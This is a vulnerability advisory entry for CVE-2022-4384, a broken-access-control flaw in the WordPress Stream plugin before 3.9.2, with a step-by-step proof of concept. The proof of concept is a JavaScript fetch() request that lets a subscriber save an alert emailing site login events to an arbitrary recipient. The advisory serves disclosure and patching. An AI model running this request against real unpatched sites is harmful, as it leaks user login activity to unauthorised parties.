Stream < 3.9.2 – Subscriber+ Alert Creation | CVE 2022-4384 | Plugin Vulnerabilities

Description

The plugin does not prevent users with little privileges on the site (like subscribers) from using its alert creation functionality, which may enable them to leak sensitive information.

Proof of Concept

Step 1: Log in as a subscriber
Step 2: Get a nonce from https://example.com/wp-admin/admin-ajax.php?action=get_new_alert_triggers_notifications
Step 3: Configure the alerts via:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },"method":"POST",
"body": "action=save_new_alert&wp_stream_alerts_nonce=XXXX&wp_stream_trigger_author=&wp_stream_trigger_context=users-sessions&wp_stream_trigger_action=login&wp_stream_alert_type=email&wp_stream_alert_status=wp_stream_enabled&wp_stream_email_recipient=recipient%40example.com&wp_stream_email_subject=test",
});

Affects Plugins

Fixed in 3.9.2

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc

Submitter twitter

Verified

Yes

WPVDB ID

2b506252-6f37-439e-8984-7316d5cca2e5

Timeline

Publicly Published

2023-01-16 (about 2 years ago)

Added

2023-01-16 (about 2 years ago)

Last Updated

2023-01-16 (about 2 years ago)

Other

Published

Title

Published

2024-06-20

Title

License Manager for WooCommerce < 3.0.7 - Improper Authorization to Authenticated(Contributor+) Sensitive Information Exposure

Published

2025-12-15

Title

Image Caption Hover Pro < 20.0 - Missing Authorization

Published

2025-11-02

Title

YOP Poll < 6.5.39 - Missing Authorization

Published

2023-11-23

Title

Debug Log Manager < 2.2.2 - Subscriber+ Debug Log Clearing

Published

2025-03-25

Title

Ultimate Dashboard < 3.8.8 - Missing Authorization to Authenticated (Subscriber+) Plugin Modules Activation/Deactivation